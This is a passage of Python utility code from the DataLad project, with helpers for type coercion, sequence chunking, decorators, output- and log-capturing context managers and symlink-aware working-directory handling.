[[CC]YY]MMDDhhmm[.SS]\n smtime = time.strftime(\"%Y%m%d%H%M.%S\", time.localtime(mtime))\n lgr.log(3, \"Setting mtime for %s to %s == %s\", filepath, mtime, smtime)\n WitlessRunner().run(['touch', '-h', '-t', '%s' % smtime, str(filepath)])\n filepath = Path(filepath)\n rfilepath = filepath.resolve()\n if filepath.is_symlink() and rfilepath.exists():\n # trust no one - adjust also of the target file\n # since it seemed like downloading under OSX (was it using curl?)\n # didn't bother with timestamps\n lgr.log(3, \"File is a symlink to %s Setting mtime for it to %s\",\n rfilepath, mtime)\n os.utime(str(rfilepath), (time.time(), mtime))\n # doesn't work on OSX\n # Runner().run(['touch', '-h', '-d', '@%s' % mtime, filepath])\n\n\n# See <https://github.com/python/typing/discussions/1366> for a request for a\n# better way to annotate this function.\ndef ensure_tuple_or_list(obj: Any) -> list | tuple:\n \"\"\"Given an object, wrap into a tuple if not list or tuple\n \"\"\"\n if isinstance(obj, (list, tuple)):\n return tuple(obj)\n return (obj,)\n\n\nListOrSet = TypeVar(\"ListOrSet\", list, set)\n\n\n# TODO: Improve annotation:\ndef ensure_iter(s: Any, cls: type[ListOrSet], copy: bool=False, iterate: bool=True) -> ListOrSet:\n \"\"\"Given not a list, would place it into a list. 
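(Hypothetical illustrations of the intent: ``ensure_iter('ab', list)`` would give ``['ab']``, while ``ensure_iter((1, 2), list)`` would give ``[1, 2]``.) 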
If None - empty list is returned\n\n Parameters\n ----------\n s: list or anything\n cls: class\n Which iterable class to ensure\n copy: bool, optional\n If correct iterable is passed, it would generate its shallow copy\n iterate: bool, optional\n If it is not a list, but something iterable (but not a str)\n iterate over it.\n \"\"\"\n\n if isinstance(s, cls):\n return s if not copy else shallow_copy(s)\n elif isinstance(s, str):\n return cls((s,))\n elif iterate and hasattr(s, '__iter__'):\n return cls(s)\n elif s is None:\n return cls()\n else:\n return cls((s,))\n\n\n# TODO: Improve annotation:\ndef ensure_list(s: Any, copy: bool=False, iterate: bool=True) -> list:\n \"\"\"Given not a list, would place it into a list. If None - empty list is returned\n\n Parameters\n ----------\n s: list or anything\n copy: bool, optional\n If list is passed, it would generate a shallow copy of the list\n iterate: bool, optional\n If it is not a list, but something iterable (but not a str)\n iterate over it.\n \"\"\"\n return ensure_iter(s, list, copy=copy, iterate=iterate)\n\n\n# TODO: Improve annotation:\ndef ensure_result_list(r: Any) -> list:\n \"\"\"Return a list of result records\n\n Largely same as ensure_list, but special casing a single dict being passed\n in, which a plain `ensure_list` would iterate over. Hence, this deals with\n the three ways datalad commands return results:\n - single dict\n - list of dicts\n - generator\n\n Used for result assertion helpers.\n \"\"\"\n return [r] if isinstance(r, dict) else ensure_list(r)\n\n@overload\ndef ensure_list_from_str(s: str, sep: str='\\n') -> Optional[list[str]]:\n ...\n\n@overload\ndef ensure_list_from_str(s: list[T], sep: str='\\n') -> Optional[list[T]]:\n ...\n\ndef ensure_list_from_str(s: str | list[T], sep: str='\\n') -> Optional[list[str]] | Optional[list[T]]:\n \"\"\"Given a multiline string convert it to a list of return None if empty\n\n Parameters\n ----------\n s: str or list\n \"\"\"\n\n if not s:\n return None\n\n if isinstance(s, list):\n return s\n return s.split(sep)\n\n@overload\ndef ensure_dict_from_str(s: str, sep: str = '\\n') -> Optional[dict[str, str]]:\n ...\n\n@overload\ndef ensure_dict_from_str(s: dict[K, V], sep: str = '\\n') -> Optional[dict[K, V]]:\n ...\n\ndef ensure_dict_from_str(s: str | dict[K, V], sep: str = '\\n') -> Optional[dict[str, str]] | Optional[dict[K, V]]:\n \"\"\"Given a multiline string with key=value items convert it to a dictionary\n\n Parameters\n ----------\n s: str or dict\n\n Returns None if input s is empty\n \"\"\"\n\n if not s:\n return None\n\n if isinstance(s, dict):\n return s\n\n out: dict[str, str] = {}\n values = ensure_list_from_str(s, sep=sep)\n assert values is not None\n for value_str in values:\n if '=' not in value_str:\n raise ValueError(\"{} is not in key=value format\".format(repr(value_str)))\n k, v = value_str.split('=', 1)\n if k in out:\n err = \"key {} was already defined in {}, but new value {} was provided\".format(k, out, v)\n raise ValueError(err)\n out[k] = v\n return out\n\n\ndef ensure_bytes(s: str | bytes, encoding: str='utf-8') -> bytes:\n \"\"\"Convert/encode unicode string to bytes.\n\n If `s` isn't a string, return it as is.\n\n Parameters\n ----------\n encoding: str, optional\n Encoding to use. 
\"utf-8\" is the default\n \"\"\"\n if not isinstance(s, str):\n return s\n return s.encode(encoding)\n\n\ndef ensure_unicode(s: str | bytes, encoding: Optional[str]=None, confidence: Optional[float]=None) -> str:\n \"\"\"Convert/decode bytestring to unicode.\n\n If `s` isn't a bytestring, return it as is.\n\n Parameters\n ----------\n encoding: str, optional\n Encoding to use. If None, \"utf-8\" is tried, and then if not a valid\n UTF-8, encoding will be guessed\n confidence: float, optional\n A value between 0 and 1, so if guessing of encoding is of lower than\n specified confidence, ValueError is raised\n \"\"\"\n if not isinstance(s, bytes):\n return s\n if encoding is None:\n # Figure out encoding, defaulting to 'utf-8' which is our common\n # target in contemporary digital society\n try:\n return s.decode('utf-8')\n except UnicodeDecodeError as exc:\n lgr.debug(\"Failed to decode a string as utf-8: %s\",\n CapturedException(exc))\n # And now we could try to guess\n from chardet import detect\n enc = detect(s)\n denc = enc.get('encoding', None)\n if denc:\n denc_confidence = enc.get('confidence', 0)\n if confidence is not None and denc_confidence < confidence:\n raise ValueError(\n \"Failed to auto-detect encoding with high enough \"\n \"confidence. Highest confidence was %s for %s\"\n % (denc_confidence, denc)\n )\n lgr.log(5, \"Auto-detected encoding to be %s\", denc)\n return s.decode(denc)\n else:\n raise ValueError(\n \"Could not decode value as utf-8, or to guess its encoding: %s\"\n % repr(s)\n )\n else:\n return s.decode(encoding)\n\n\ndef ensure_bool(s: Any) -> bool:\n \"\"\"Convert value into boolean following convention for strings\n\n to recognize on,True,yes as True, off,False,no as False\n \"\"\"\n if isinstance(s, str):\n if s.isdigit():\n return bool(int(s))\n sl = s.lower()\n if sl in {'y', 'yes', 'true', 'on'}:\n return True\n elif sl in {'n', 'no', 'false', 'off'}:\n return False\n else:\n raise ValueError(\"Do not know how to treat %r as a boolean\" % s)\n return bool(s)\n\n\ndef unique(seq: Sequence[T], key: Optional[Callable[[T], Any]]=None, reverse: bool=False) -> list[T]:\n \"\"\"Given a sequence return a list only with unique elements while maintaining order\n\n This is the fastest solution. 
See\n https://www.peterbe.com/plog/uniqifiers-benchmark\n and\n http://stackoverflow.com/a/480227/1265472\n for more information.\n Enhancement -- added ability to compare for uniqueness using a key function\n\n Parameters\n ----------\n seq:\n Sequence to analyze\n key: callable, optional\n Function to call on each element so we could decide not on a full\n element, but on its member etc\n reverse: bool, optional\n If True, uniqueness checked in the reverse order, so that the later ones\n will take the order\n \"\"\"\n seen: set[T] = set()\n seen_add = seen.add\n\n if reverse:\n def trans(x: Sequence[T]) -> Iterable[T]:\n return reversed(x)\n else:\n def trans(x: Sequence[T]) -> Iterable[T]:\n return x\n\n if key is None:\n out = [x for x in trans(seq) if not (x in seen or seen_add(x))]\n else:\n # OPT: could be optimized, since key is called twice, but for our cases\n # should be just as fine\n out = [x for x in trans(seq) if not (key(x) in seen or seen_add(key(x)))]\n\n return out[::-1] if reverse else out\n\n\n# TODO: Annotate (would be made easier if the return value was always a dict\n# instead of doing `v.__class__(...)`)\ndef map_items(func, v):\n \"\"\"A helper to apply `func` to all elements (keys and values) within dict\n\n No type checking of values passed to func is done, so `func`\n should be resilient to values which it should not handle\n\n Initial usecase - apply_recursive(url_fragment, ensure_unicode)\n \"\"\"\n # map all elements within item\n return v.__class__(\n item.__class__(map(func, item))\n for item in v.items()\n )\n\n\ndef partition(items: Iterable[T], predicate: Callable[[T], Any]=bool) -> tuple[Iterator[T], Iterator[T]]:\n \"\"\"Partition `items` by `predicate`.\n\n Parameters\n ----------\n items : iterable\n predicate : callable\n A function that will be mapped over each element in `items`. The\n elements will partitioned based on whether the return value is false or\n true.\n\n Returns\n -------\n A tuple with two generators, the first for 'false' items and the second for\n 'true' ones.\n\n Notes\n -----\n Taken from Peter Otten's snippet posted at\n https://nedbatchelder.com/blog/201306/filter_a_list_into_two_parts.html\n \"\"\"\n a, b = tee((predicate(item), item) for item in items)\n return ((item for pred, item in a if not pred),\n (item for pred, item in b if pred))\n\n\ndef generate_chunks(container: list[T], size: int) -> Iterator[list[T]]:\n \"\"\"Given a container, generate chunks from it with size up to `size`\n \"\"\"\n # There could be a \"smarter\" solution but I think this would suffice\n assert size > 0, \"Size should be non-0 positive\"\n while container:\n yield container[:size]\n container = container[size:]\n\n\ndef generate_file_chunks(files: list[str], cmd: str | list[str] | None = None) -> Iterator[list[str]]:\n \"\"\"Given a list of files, generate chunks of them to avoid exceeding cmdline length\n\n Parameters\n ----------\n files: list of str\n cmd: str or list of str, optional\n Command to account for as well\n \"\"\"\n files = ensure_list(files)\n cmd = ensure_list(cmd)\n\n maxl = max(map(len, files)) if files else 0\n chunk_size = max(\n 1, # should at least be 1. If blows then - not our fault\n (CMD_MAX_ARG\n - sum((len(x) + 3) for x in cmd)\n - 4 # for '--' below\n ) // (maxl + 3) # +3 for possible quotes and a space\n )\n # TODO: additional treatment for \"too many arguments\"? 
although\n # as https://github.com/datalad/datalad/issues/1883#issuecomment\n # -436272758\n # shows there seems to be no hardcoded limit on # of arguments,\n # but may be we decide to go for smth like follow to be on safe side\n # chunk_size = min(10240 - len(cmd), chunk_size)\n file_chunks = generate_chunks(files, chunk_size)\n return file_chunks\n\n\n#\n# Generators helpers\n#\n\ndef saved_generator(gen: Iterable[T]) -> tuple[Iterator[T], Iterator[T]]:\n \"\"\"Given a generator returns two generators, where 2nd one just replays\n\n So the first one would be going through the generated items and 2nd one\n would be yielding saved items\n \"\"\"\n saved = []\n\n def gen1() -> Iterator[T]:\n for x in gen: # iterating over original generator\n saved.append(x)\n yield x\n\n def gen2() -> Iterator[T]:\n for x in saved: # yielding saved entries\n yield x\n\n return gen1(), gen2()\n\n\n#\n# Decorators\n#\n\n# Originally better_wraps was created to provide `wrapt`-based, instead of\n# `functools.wraps` implementation to preserve the correct signature of the\n# decorated function. By using inspect.signature in our getargspec, which\n# works fine on `functools.wraps`ed functions, we mediated this necessity.\nbetter_wraps = wraps\n\n\n# TODO: Annotate:\n# Borrowed from pandas\n# Copyright: 2011-2014, Lambda Foundry, Inc. and PyData Development Team\n# License: BSD-3\ndef optional_args(decorator):\n \"\"\"allows a decorator to take optional positional and keyword arguments.\n Assumes that taking a single, callable, positional argument means that\n it is decorating a function, i.e. something like this::\n\n @my_decorator\n def function(): pass\n\n Calls decorator with decorator(f, `*args`, `**kwargs`)\"\"\"\n\n @better_wraps(decorator)\n def wrapper(*args, **kwargs):\n def dec(f):\n return decorator(f, *args, **kwargs)\n\n is_decorating = not kwargs and len(args) == 1 and isinstance(args[0], Callable)\n if is_decorating:\n f = args[0]\n args = []\n return dec(f)\n else:\n return dec\n\n return wrapper\n\n\n# TODO: just provide decorators for tempfile.mk* functions. This is ugly!\ndef get_tempfile_kwargs(tkwargs: Optional[dict[str, Any]]=None, prefix: str=\"\", wrapped: Optional[Callable]=None) -> dict[str, Any]:\n \"\"\"Updates kwargs to be passed to tempfile. 
calls depending on env vars\n \"\"\"\n if tkwargs is None:\n tkwargs_ = {}\n else:\n # operate on a copy of tkwargs to avoid any side-effects\n tkwargs_ = tkwargs.copy()\n\n # TODO: don't remember why I had this one originally\n # if len(targs)<2 and \\\n if 'prefix' not in tkwargs_:\n tkwargs_['prefix'] = '_'.join(\n ['datalad_temp'] +\n ([prefix] if prefix else []) +\n ([''] if (on_windows or not wrapped) else [wrapped.__name__]))\n\n directory = os.environ.get('TMPDIR')\n if directory and 'dir' not in tkwargs_:\n tkwargs_['dir'] = directory\n\n return tkwargs_\n\n\ndef line_profile(func: Callable[P, T]) -> Callable[P, T]:\n \"\"\"Q&D helper to line profile the function and spit out stats\n \"\"\"\n import line_profiler # type: ignore[import]\n prof = line_profiler.LineProfiler()\n\n @wraps(func)\n def _wrap_line_profile(*args: P.args, **kwargs: P.kwargs) -> T:\n try:\n pfunc = prof(func)\n return pfunc(*args, **kwargs)\n finally:\n prof.print_stats()\n return _wrap_line_profile\n\n\n# unused in -core\n@optional_args\ndef collect_method_callstats(func: Callable[P, T]) -> Callable[P, T]:\n \"\"\"Figure out methods which call the method repeatedly on the same instance\n\n Use case(s):\n - .repo is expensive since does all kinds of checks.\n - .config is expensive transitively since it calls .repo each time\n\n TODO:\n - fancy one could look through the stack for the same id(self) to see if\n that location is already in memo. That would hint to the cases where object\n is not passed into underlying functions, causing them to redo the same work\n over and over again\n - ATM might flood with all \"1 lines\" calls which are not that informative.\n The underlying possibly suboptimal use might be coming from their callers.\n It might or not relate to the previous TODO\n \"\"\"\n import traceback\n from collections import defaultdict\n from time import time\n memo: defaultdict[tuple[int, str], defaultdict[int, int]] = defaultdict(lambda: defaultdict(int)) # it will be a dict of lineno: count\n # gross timing\n times = []\n toppath = dirname(__file__) + sep\n\n @wraps(func)\n def _wrap_collect_method_callstats(*args: P.args, **kwargs: P.kwargs) -> T:\n try:\n self = args[0]\n stack = traceback.extract_stack()\n caller = stack[-2]\n stack_sig = \\\n \"{relpath}:{s.name}\".format(\n s=caller, relpath=relpath(caller.filename, toppath))\n sig = (id(self), stack_sig)\n # we will count based on id(self) + wherefrom\n if caller.lineno is not None:\n memo[sig][caller.lineno] += 1\n t0 = time()\n return func(*args, **kwargs)\n finally:\n times.append(time() - t0)\n pass\n\n def print_stats() -> None:\n print(\"The cost of property {}:\".format(func.__name__))\n if not memo:\n print(\"None since no calls\")\n return\n # total count\n counts = {k: sum(v.values()) for k,v in memo.items()}\n total = sum(counts.values())\n ids = {self_id for (self_id, _) in memo}\n print(\" Total: {} calls from {} objects with {} contexts taking {:.2f} sec\"\n .format(total, len(ids), len(memo), sum(times)))\n # now we need to sort by value\n for (self_id, caller), count in sorted(counts.items(), key=lambda x: x[1], reverse=True):\n print(\" {} {}: {} from {} lines\"\n .format(self_id, caller, count, len(memo[(self_id, caller)])))\n\n # Upon total exit we print the stats\n import atexit\n atexit.register(print_stats)\n\n return _wrap_collect_method_callstats\n\n\n# Borrowed from duecredit to wrap duecredit-handling to guarantee failsafe\ndef never_fail(f: Callable[P, T]) -> Callable[P, Optional[T]]:\n \"\"\"Assure that function 
never fails -- all exceptions are caught\n\n Returns `None` if function fails internally.\n \"\"\"\n @wraps(f)\n def wrapped_func(*args: P.args, **kwargs: P.kwargs) -> Optional[T]:\n try:\n return f(*args, **kwargs)\n except Exception as e:\n lgr.warning(\n \"DataLad internal failure while running %s: %r. \"\n \"Please report at https://github.com/datalad/datalad/issues\"\n % (f, e)\n )\n return None\n\n if os.environ.get('DATALAD_ALLOW_FAIL', False):\n return f\n else:\n return wrapped_func\n\n\ndef shortened_repr(value: Any, l: int=30) -> str:\n try:\n if hasattr(value, '__repr__') and (value.__repr__ is not object.__repr__):\n value_repr = repr(value)\n if not value_repr.startswith('<') and len(value_repr) > l:\n value_repr = \"<<%s++%d chars++%s>>\" % (\n value_repr[:l - 16],\n len(value_repr) - (l - 16 + 4),\n value_repr[-4:]\n )\n elif value_repr.startswith('<') and value_repr.endswith('>') and ' object at 0x':\n raise ValueError(\"I hate those useless long reprs\")\n else:\n raise ValueError(\"gimme class\")\n except Exception as e:\n value_repr = \"<%s>\" % value.__class__.__name__.split('.')[-1]\n return value_repr\n\n\ndef __auto_repr__(obj: Any, short: bool =True) -> str:\n attr_names: tuple[str, ...] = tuple()\n if hasattr(obj, '__dict__'):\n attr_names += tuple(obj.__dict__.keys())\n if hasattr(obj, '__slots__'):\n attr_names += tuple(obj.__slots__)\n\n items = []\n for attr in sorted(set(attr_names)):\n if attr.startswith('_'):\n continue\n value = getattr(obj, attr)\n # TODO: should we add this feature to minimize some talktative reprs\n # such as of URL?\n #if value is None:\n # continue\n items.append(\"%s=%s\" % (attr, shortened_repr(value) if short else value))\n\n return \"%s(%s)\" % (obj.__class__.__name__, ', '.join(items))\n\n\n@optional_args\ndef auto_repr(cls: type[T], short: bool=True) -> type[T]:\n \"\"\"Decorator for a class to assign it an automagic quick and dirty __repr__\n\n It uses public class attributes to prepare repr of a class\n\n Original idea: http://stackoverflow.com/a/27799004/1265472\n \"\"\"\n\n cls.__repr__ = lambda obj:__auto_repr__(obj, short=short) # type: ignore[assignment]\n return cls\n\n\ndef todo_interface_for_extensions(f: T) -> T:\n return f\n\n\n#\n# Context Managers\n#\n\n\n# unused in -core\n@contextmanager\ndef nothing_cm() -> Iterator[None]:\n \"\"\"Just a dummy cm to programmically switch context managers\"\"\"\n yield\n\n\nclass SwallowOutputsAdapter:\n \"\"\"Little adapter to help getting out/err values\n \"\"\"\n def __init__(self) -> None:\n kw = get_tempfile_kwargs({}, prefix=\"outputs\")\n\n self._out = NamedTemporaryFile(delete=False, mode='w', **kw)\n self._err = NamedTemporaryFile(delete=False, mode='w', **kw)\n\n def _read(self, h: IO[str]) -> str:\n with open(h.name) as f:\n return f.read()\n\n @property\n def out(self) -> str:\n if not self._out.closed:\n self._out.flush()\n return self._read(self._out)\n\n @property\n def err(self) -> str:\n if not self._err.closed:\n self._err.flush()\n return self._read(self._err)\n\n @property\n def handles(self) -> tuple[TextIO, TextIO]:\n return (cast(TextIO, self._out), cast(TextIO, self._err))\n\n def cleanup(self) -> None:\n self._out.close()\n self._err.close()\n out_name = self._out.name\n err_name = self._err.name\n from datalad import cfg\n if cfg.getbool('datalad.log', 'outputs', default=False) \\\n and lgr.getEffectiveLevel() <= logging.DEBUG:\n for s, sname in ((self.out, 'stdout'),\n (self.err, 'stderr')):\n if s:\n pref = os.linesep + \"| \"\n lgr.debug(\"Swallowed 
%s:%s%s\", sname, pref, s.replace(os.linesep, pref))\n else:\n lgr.debug(\"Nothing was swallowed for %s\", sname)\n del self._out\n del self._err\n gc.collect()\n rmtemp(out_name)\n rmtemp(err_name)\n\n@contextmanager\ndef swallow_outputs() -> Iterator[SwallowOutputsAdapter]:\n \"\"\"Context manager to help consuming both stdout and stderr, and print()\n\n stdout is available as cm.out and stderr as cm.err whenever cm is the\n yielded context manager.\n Internally uses temporary files to guarantee absent side-effects of swallowing\n into StringIO which lacks .fileno.\n\n print mocking is necessary for some uses where sys.stdout was already bound\n to original sys.stdout, thus mocking it later had no effect. Overriding\n print function had desired effect\n \"\"\"\n\n def fake_print(*args: str, sep: str = ' ', end: str = \"\\n\", file: Optional[IO[str]] = None) -> None:\n if file is None:\n file = sys.stdout\n\n if file in (oldout, olderr, sys.stdout, sys.stderr):\n # we mock\n try:\n sys.stdout.write(sep.join(args) + end)\n except UnicodeEncodeError as exc:\n lgr.error(\n \"Failed to write to mocked stdout, got %s, continue as it \"\n \"didn't happen\", exc)\n else:\n # must be some other file one -- leave it alone\n oldprint(*args, sep=sep, end=end, file=file)\n\n from .ui import ui\n\n # preserve -- they could have been mocked already\n oldprint = getattr(builtins, 'print')\n oldout, olderr = sys.stdout, sys.stderr\n olduiout = ui.out\n adapter = SwallowOutputsAdapter()\n\n try:\n sys.stdout, sys.stderr = adapter.handles\n ui.out = adapter.handles[0]\n setattr(builtins, 'print', fake_print)\n\n yield adapter\n finally:\n sys.stdout, sys.stderr, ui.out = oldout, olderr, olduiout\n setattr(builtins, 'print', oldprint)\n adapter.cleanup()\n\n\n# Let's log everything into a string\n# TODO: generalize with the one for swallow_outputs\nclass SwallowLogsAdapter:\n \"\"\"Little adapter to help getting out values\n\n And to stay consistent with how swallow_outputs behaves\n \"\"\"\n def __init__(self, file_: str | Path | None) -> None:\n self._out: IO[str]\n if file_ is None:\n kw = get_tempfile_kwargs({}, prefix=\"logs\")\n self._out = NamedTemporaryFile(mode='a', delete=False, **kw)\n else:\n out_file = file_\n # PY3 requires clearly one or another. 
race condition possible\n self._out = open(out_file, 'a')\n self.file = file_\n self._final_out: Optional[str] = None\n\n def _read(self, h: IO[str]) -> str:\n with open(h.name) as f:\n return f.read()\n\n @property\n def out(self) -> str:\n if self._final_out is not None:\n # we closed and cleaned up already\n return self._final_out\n else:\n self._out.flush()\n return self._read(self._out)\n\n @property\n def lines(self) -> list[str]:\n return self.out.split('\\n')\n\n @property\n def handle(self) -> IO[str]:\n return self._out\n\n def cleanup(self) -> None:\n # store for access while object exists\n self._final_out = self.out\n self._out.close()\n out_name = self._out.name\n del self._out\n gc.collect()\n if not self.file:\n rmtemp(out_name)\n\n def assert_logged(self, msg: Optional[str]=None, level: Optional[str]=None, regex: bool =True, **kwargs: Any) -> None:\n \"\"\"Provide assertion on whether a msg was logged at a given level\n\n If neither `msg` nor `level` provided, checks if anything was logged\n at all.\n\n Parameters\n ----------\n msg: str, optional\n Message (as a regular expression, if `regex`) to be searched.\n If no msg provided, checks if anything was logged at a given level.\n level: str, optional\n String representing the level to be logged\n regex: bool, optional\n If False, regular `assert_in` is used\n **kwargs: str, optional\n Passed to `assert_re_in` or `assert_in`\n \"\"\"\n from datalad.tests.utils_pytest import (\n assert_in,\n assert_re_in,\n )\n\n if regex:\n match = r'\\[%s\\] ' % level if level else r\"\\[\\S+\\] \"\n else:\n match = '[%s] ' % level if level else ''\n\n if msg:\n match += msg\n\n if match:\n (assert_re_in if regex else assert_in)(match, self.out, **kwargs)\n else:\n assert not kwargs, \"no kwargs to be passed anywhere\"\n assert self.out, \"Nothing was logged!?\"\n\n\n@contextmanager\ndef swallow_logs(new_level: str | int | None = None, file_ : str | Path | None = None, name: str='datalad') -> Iterator[SwallowLogsAdapter]:\n \"\"\"Context manager to consume all logs.\"\"\"\n lgr = logging.getLogger(name)\n\n # Keep old settings\n old_level = lgr.level\n old_handlers = lgr.handlers\n\n adapter = SwallowLogsAdapter(file_)\n # TODO: it does store messages but without any formatting, i.e. even without\n # date/time prefix etc. IMHO it should preserve formatting in case if file_ is\n # set\n swallow_handler = logging.StreamHandler(adapter.handle)\n # we want to log levelname so we could test against it\n swallow_handler.setFormatter(\n logging.Formatter('[%(levelname)s] %(message)s'))\n swallow_handler.filters = sum([h.filters for h in old_handlers],\n [])\n lgr.handlers = [swallow_handler]\n if old_level < logging.DEBUG: # so if HEAVYDEBUG etc -- show them!\n lgr.handlers += old_handlers\n\n if isinstance(new_level, str):\n new_level = getattr(logging, new_level)\n\n if new_level is not None:\n lgr.setLevel(new_level)\n\n try:\n yield adapter\n # TODO: if file_ and there was an exception -- most probably worth logging it?\n # although ideally it should be the next log outside added to that file_ ... 
oh well\n finally:\n lgr.handlers = old_handlers\n lgr.setLevel(old_level)\n adapter.cleanup()\n\n\n# TODO: May be melt in with swallow_logs at some point:\n@contextmanager\ndef disable_logger(logger: Optional[logging.Logger]=None) -> Iterator[logging.Logger]:\n \"\"\"context manager to temporarily disable logging\n\n This is to provide one of swallow_logs' purposes without unnecessarily\n creating temp files (see gh-1865)\n\n Parameters\n ----------\n logger: Logger\n Logger whose handlers will be ordered to not log anything.\n Default: datalad's topmost Logger ('datalad')\n \"\"\"\n\n class NullFilter(logging.Filter):\n \"\"\"Filter class to reject all records\n \"\"\"\n def filter(self, record: logging.LogRecord) -> bool:\n return False\n\n if logger is None:\n # default: all of datalad's logging:\n logger = logging.getLogger('datalad')\n\n filter_ = NullFilter(logger.name)\n for h in logger.handlers:\n h.addFilter(filter_)\n\n try:\n yield logger\n finally:\n for h in logger.handlers:\n h.removeFilter(filter_)\n\n\n@contextmanager\ndef lock_if_required(lock_required: bool, lock: threading.Lock) -> Iterator[threading.Lock]:\n \"\"\" Acquired and released the provided lock if indicated by a flag\"\"\"\n if lock_required:\n lock.acquire()\n try:\n yield lock\n finally:\n if lock_required:\n lock.release()\n\n\n#\n# Additional handlers\n#\ndef ensure_dir(*args: str) -> str:\n \"\"\"Make sure directory exists.\n\n Joins the list of arguments to an os-specific path to the desired\n directory and creates it, if it not exists yet.\n \"\"\"\n dirname = op.join(*args)\n if not exists(dirname):\n os.makedirs(dirname)\n return dirname\n\n\ndef updated(d: dict[K, V], update: dict[K, V]) -> dict[K, V]:\n \"\"\"Return a copy of the input with the 'update'\n\n Primarily for updating dictionaries\n \"\"\"\n d = d.copy()\n d.update(update)\n return d\n\n\n_pwd_mode: Optional[str] = None\n\n\ndef _switch_to_getcwd(msg: str, *args: Any) -> None:\n global _pwd_mode\n _pwd_mode = 'cwd'\n lgr.debug(\n msg + \". From now on will be returning os.getcwd(). Directory\"\n \" symlinks in the paths will be resolved\",\n *args\n )\n # TODO: we might want to mitigate by going through all flywheighted\n # repos and tuning up their .paths to be resolved?\n\n\ndef getpwd() -> str:\n \"\"\"Try to return a CWD without dereferencing possible symlinks\n\n This function will try to use PWD environment variable to provide a current\n working directory, possibly with some directories along the path being\n symlinks to other directories. Unfortunately, PWD is used/set only by the\n shell and such functions as `os.chdir` and `os.getcwd` nohow use or modify\n it, thus `os.getcwd()` returns path with links dereferenced.\n\n While returning current working directory based on PWD env variable we\n verify that the directory is the same as `os.getcwd()` after resolving all\n symlinks. If that verification fails, we fall back to always use\n `os.getcwd()`.\n\n Initial decision to either use PWD env variable or os.getcwd() is done upon\n the first call of this function.\n \"\"\"\n global _pwd_mode\n if _pwd_mode is None:\n # we need to decide!\n try:\n pwd = os.environ['PWD']\n if on_windows and pwd and pwd.startswith('/'):\n # It should be a path from MSYS.\n # - it might start with a drive letter or not\n # - it seems to be \"illegal\" to have a single letter directories\n # under / path, i.e. 
if created - they aren't found\n # - 'ln -s' does not fail to create a \"symlink\" but it just\n # copies!\n # so we are not likely to need original PWD purpose on\n # those systems\n # Verdict:\n _pwd_mode = 'cwd'\n else:\n _pwd_mode = 'PWD'\n except KeyError:\n _pwd_mode = 'cwd'\n\n if _pwd_mode == 'cwd':\n return os.getcwd()\n elif _pwd_mode == 'PWD':\n try:\n cwd = os.getcwd()\n except OSError as exc:\n if \"o such file\" in str(exc):\n # directory was removed but we promised to be robust and\n # still report the path we might know since we are still in PWD\n # mode\n cwd = None\n else:\n raise\n try:\n pwd = os.environ['PWD']\n # do absolute() in addition to always get an absolute path\n # even with non-existing paths on windows\n pwd_real = str(Path(pwd).resolve().absolute())\n # This logic would fail to catch the case where chdir did happen\n # to the directory where current PWD is pointing to, e.g.\n # $> ls -ld $PWD\n # lrwxrwxrwx 1 yoh yoh 5 Oct 11 13:27 /home/yoh/.tmp/tmp -> /tmp//\n # hopa:~/.tmp/tmp\n # $> python -c 'import os; os.chdir(\"/tmp\"); from datalad.utils import getpwd; print(getpwd(), os.getcwd())'\n # ('/home/yoh/.tmp/tmp', '/tmp')\n # but I guess that should not be too harmful\n if cwd is not None and pwd_real != cwd:\n _switch_to_getcwd(\n \"realpath of PWD=%s is %s whenever os.getcwd()=%s\",\n pwd, pwd_real, cwd\n )\n return cwd\n return pwd\n except KeyError:\n _switch_to_getcwd(\"PWD env variable is no longer available\")\n if cwd is not None:\n return cwd # Must not happen, but may be someone\n # evil purges PWD from environ?\n raise RuntimeError(\n \"Must have not got here. \"\n \"pwd_mode must be either cwd or PWD. And it is now %r\" % (_pwd_mode,)\n )\n\n\nclass chpwd:\n \"\"\"Wrapper around os.chdir which also adjusts environ['PWD']\n\n The reason is that otherwise PWD is simply inherited from the shell\n and we have no ability to assess directory path without dereferencing\n symlinks.\n\n If used as a context manager it allows to temporarily change directory\n to the given path\n \"\"\"\n def __init__(self, path: str | Path | None, mkdir: bool=False, logsuffix: str='') -> None:\n\n self._prev_pwd: Optional[str]\n if path:\n pwd = getpwd()\n self._prev_pwd = pwd\n else:\n self._prev_pwd = None\n return\n\n if not isabs(path):\n path = normpath(op.join(pwd, path))\n if not os.path.exists(path) and mkdir:\n self._mkdir = True\n os.mkdir(path)\n else:\n self._mkdir = False\n lgr.debug(\"chdir %r -> %r %s\", self._prev_pwd, path, logsuffix)\n os.chdir(path) # for grep people -- ok, to chdir here!\n os.environ['PWD'] = str(path)\n\n def __enter__(self) -> None:\n # nothing more to do really, chdir was in the constructor\n pass\n\n def __exit__(self, exc_type: Optional[type[BaseException]], exc_val: Optional[BaseException], exc_tb: Optional[TracebackType]) -> None:\n if self._prev_pwd:\n # Need to use self.__class__ so this instance, if the entire\n # thing mocked during the test, still would use correct chpwd\n self.__class__(self._prev_pwd, logsuffix=\"(coming back)\")\n\n\ndef dlabspath(path: str | Path, norm: bool =False) -> str:\n \"\"\"Symlinks-in-the-cwd aware abspath\n\n os.path.abspath relies on os.getcwd() which would not know about symlinks\n in the path\n\n TODO: we might want to norm=True by default to match behavior of\n os .path.abspath?\n \"\"\"\n if not isabs(path):\n # if not absolute -- relative to pwd\n path = op.join(getpwd(), path)\n return normpath(path) if norm else str(path)\n\n\ndef with_pathsep(path: str) -> str:\n \"\"\"Little 
helper to guarantee that path ends with /\"\"\"\n return path + sep if not path.endswith(sep) else path\n\n\ndef get_path_prefix(path: str | Path, pwd: Optional[str]=None) -> str:\n \"\"\"Get path prefix (for current directory)\n\n Returns relative path to the topdir, if we are under topdir, and if not\n absolute path to topdir. If `pwd` is not specified - current directory\n assumed\n \"\"\"\n pwd = pwd or getpwd()\n path = dlabspath(path)\n path_ = with_pathsep(path)\n pwd_ = with_pathsep(pwd)\n common = commonprefix((path_, pwd_))\n if common.endswith(sep) and common in {path_, pwd_}:\n # we are in subdir or above the path = use relative path\n location_prefix = relpath(path, pwd)\n # if benign \"here\" - cut off\n if location_prefix in (curdir, curdir + sep):\n location_prefix = ''\n return location_prefix\n else:\n # just return absolute path\n return path\n\n\ndef _get_normalized_paths(path: str, prefix: str) -> tuple[str, str]:\n if isabs(path) != isabs(prefix):\n raise ValueError(\"Both paths must either be absolute or relative. \"\n \"Got %r and %r\" % (path, prefix))\n path = with_pathsep(path)\n prefix = with_pathsep(prefix)\n return path, prefix\n\n\ndef path_startswith(path: str, prefix: str) -> bool:\n 